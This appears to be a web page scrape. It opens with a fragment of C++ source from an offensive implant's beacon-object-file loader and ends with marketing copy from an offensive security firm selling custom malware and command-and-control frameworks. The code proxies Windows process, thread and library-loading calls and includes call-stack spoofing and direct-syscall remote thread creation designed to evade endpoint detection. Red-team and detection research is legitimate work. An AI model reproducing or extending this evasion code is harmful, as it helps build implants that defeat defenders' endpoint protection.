static BOOL WINAPI bof_thunk_CreateProcessW(const wchar_t* app, wchar_t* cmd, void* pa, void* ta, BOOL inh,
                                            DWORD fl, void* env, const wchar_t* dir, void* si, void* pi) {
    auto pfn = (BOOL(WINAPI*)(const wchar_t*, wchar_t*, void*, void*, BOOL, DWORD, void*, const wchar_t*, void*,
                              void*))bof_proxy_k32("CreateProcessW");
    return pfn ? pfn(app, cmd, pa, ta, inh, fl, env, dir, si, pi) : FALSE;
}

static HRESULT WINAPI bof_thunk_CoInitialize(void* r) {
    auto pfn = (HRESULT(WINAPI*)(void*))bof_proxy_ole32("CoInitialize");
    return pfn ? pfn(r) : (HRESULT)0x80004005;
}

static HRESULT WINAPI bof_thunk_CoInitializeEx(void* r, DWORD co) {
    auto pfn = (HRESULT(WINAPI*)(void*, DWORD))bof_proxy_ole32("CoInitializeEx");
    return pfn ? pfn(r, co) : (HRESULT)0x80004005;
}

static HANDLE WINAPI bof_thunk_CreateThread(void* sa, SIZE_T stack, void* start, void* param, DWORD fl,
                                            DWORD* tid) {
    agent_ctx* c = bof_proxy_ctx();
    if (!c || !c->kernel)
        return nullptr;
    auto pfn = (void*)bof_proxy_k32("CreateThread");
    if (!pfn)
        return nullptr;
#if DRAUGR_STACK
    if (_KSP(c))
        return (HANDLE)draugr_spoof_call(c->kernel, pfn, 6,
            _U64(sa), (uint64_t)stack, _U64(start), _U64(param), (uint64_t)fl, _U64(tid));
#endif
    return ((HANDLE(WINAPI*)(void*, SIZE_T, void*, void*, DWORD, DWORD*))pfn)(sa, stack, start, param, fl, tid);
}

static HANDLE WINAPI bof_thunk_CreateRemoteThread(HANDLE proc, void* sa, SIZE_T stack, void* start, void* param,
                                                  DWORD fl, DWORD* tid) {
    (void)sa;
    (void)tid;
    agent_ctx* c = bof_proxy_ctx();
    if (!c || !c->kernel)
        return nullptr;
#if EVASION_SYSCALLS
    return nt_create_thread_ex(c->kernel, proc, start, param, fl, 0x1FFFFFu, stack);
#else
    auto pfn = (HANDLE(WINAPI*)(HANDLE, void*, SIZE_T, void*, void*, DWORD, DWORD*))bof_proxy_k32(
        "CreateRemoteThread");
    return pfn ? pfn(proc, sa, stack, start, param, fl, tid) : nullptr;
#endif
}

static HMODULE WINAPI bof_thunk_LoadLibraryA(LPCSTR n) {
    agent_ctx* c = bof_proxy_ctx();
    if (!c || !c->kernel)
        return nullptr;
    return (HMODULE)dispatch_ldr_load_dll_a(c->kernel, n);
}

static HMODULE WINAPI bof_thunk_LoadLibraryW(LPCWSTR n) {
    agent_ctx* c = bof_proxy_ctx();
    if (!c || !c->kernel || !n)
        return nullptr;
    char narrow[260];
    int i = 0;
    while (n[i] && i < 259) {
        narrow[i] = (char)(n[i] & 0x7F);
        i++;
    }
    narrow[i] = 0;
    return (HMODULE)dispatch_ldr_load_dll_a(c->kernel, narrow);
}

Iron Sharpens Iron

Detecting and preventing advanced threats requires advanced offensive capabilities. We provide the software and services clients need to meet this requirement.

INQUIRE VIEW CAPABILITIES

LOCATIONS

Australia
Global

CAPABILITIES

Advanced Capability for
Discerning Clients.

Custom Malware Development

Bespoke payload engineering designed to enhance your internal adversary simulation capability. We develop tailored solutions that bypass modern EDR and XDR stacks using the same techniques and strategies used by real advanced adversaries.

Automated Adversary Emulation

Develop consistent and reliable baseline detections in your environment by using our automated purple teaming platform. Test your environment against frontier EDR evasion techniques.

Command and Control

For high-end adversary simulation operations, custom command and control frameworks provide a distinct advantage over open-source or commonly used commercial frameworks.

ABOUT US

Research led,
built for operations.

Counterforce Group is a research-led offensive security organisation. We help clients develop the adversarial capability required to strengthen resilience against advanced threats. Our approach is grounded in the belief that effective defence depends on understanding and applying advanced offensive tradecraft.

In-house Capability

Tailored Services

Deep Industry Experience

ENGAGEMENT

Secure Inquiry

For service inquiries, please fill in the contact form.